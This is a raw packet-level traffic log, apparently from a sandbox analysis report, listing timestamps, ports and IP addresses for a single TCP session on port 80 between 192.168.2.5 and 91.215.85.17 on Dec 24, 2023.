Dec 24, 2023 10:44:27.030378103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030482054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030517101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030522108 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.030554056 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.030575037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030600071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030617952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.030636072 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.030673027 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030714989 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.030791998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030805111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030831099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030846119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.030870914 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.030906916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030946016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.030963898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031013012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.031014919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031048059 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.031085014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031124115 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.031126976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031163931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.031186104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031219006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.031255007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031292915 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.031347990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031388998 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.031389952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031429052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.031440973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031476021 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.031512022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031560898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031599045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.031660080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031796932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.031833887 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.031992912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.032028913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.032088041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.032269001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.032319069 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.032382011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.032489061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.032533884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.032571077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.032598019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.032623053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.032650948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.032660007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.032725096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.032747984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.032762051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.032804012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.032840014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.032907963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.032953024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.032977104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033015966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.033041000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033118010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033160925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.033206940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033221006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033260107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.033284903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033322096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.033358097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033406973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033452034 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.033471107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033495903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033545017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.033582926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033618927 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.033626080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033689022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033735991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033735991 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.033807039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033848047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.033905983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033919096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.033942938 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.033972025 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.034002066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034018993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034041882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.034053087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.034070969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034137011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034177065 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.034244061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034257889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034297943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.034323931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034372091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034409046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.034425020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034457922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.034470081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034516096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034559011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.034596920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034729958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034770966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.034837008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.034872055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.034920931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035070896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035077095 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.035106897 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.035131931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035181999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.035218000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035257101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.035317898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035356045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.035357952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035394907 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.035415888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035439014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035474062 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.035511017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035581112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035625935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.035634995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035670996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.035732985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035794973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035839081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.035862923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035909891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.035950899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.035964012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036010981 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036021948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036067009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036067009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036108971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036113024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036154032 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036161900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036205053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036205053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036248922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036314964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036328077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036364079 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036397934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036443949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036454916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036497116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036499023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036540031 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036549091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036590099 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036598921 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036643982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036648035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036709070 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036729097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036751986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036777973 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036786079 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036798954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036839962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036855936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036900997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.036936998 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.036958933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037003994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037005901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037049055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037054062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037094116 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037126064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037169933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037172079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037214994 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037218094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037260056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037260056 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037302017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037339926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037391901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037451982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037497997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037554979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037590027 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037606955 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037631989 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037727118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037772894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037791014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037830114 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037837029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037879944 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.037935019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.037976980 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038002014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038044930 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038063049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038106918 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038116932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038156986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038161039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038196087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038198948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038220882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038240910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038270950 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038304090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038347960 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038381100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038425922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038451910 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038497925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038515091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038561106 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038568974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038613081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038614988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038638115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038659096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038678885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038697004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038741112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038765907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038808107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038824081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038866997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038878918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038924932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038925886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.038968086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.038990021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039032936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039041996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039084911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039088011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039134026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039169073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039213896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039257050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039300919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039303064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039344072 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039346933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039387941 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039411068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039453983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039463997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039506912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039519072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039561033 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039586067 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039628983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039639950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039685965 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039709091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039752960 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039776087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039820910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039874077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039912939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.039916992 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.039957047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040014029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040061951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040075064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040117979 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040122032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040162086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040185928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040229082 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040256023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040297985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040316105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040359974 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040381908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040426016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040427923 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040467978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040503979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040518045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040549040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040586948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040632010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040632963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040678978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040684938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040743113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040766954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040779114 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040808916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040848970 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040865898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040899992 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.040936947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040976048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.040985107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041024923 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041049957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.041093111 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041095972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.041135073 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041151047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.041189909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041208029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.041248083 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041259050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.041300058 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041382074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.041424990 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041450024 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.041493893 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041589975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.041627884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041683912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.041726112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041749954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.041795015 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041877031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.041919947 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.041975975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042018890 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.042030096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042073011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.042077065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042117119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.042222977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042263985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.042298079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.042337894 CET	49716	80	192.168.2.5	91.215.85.17
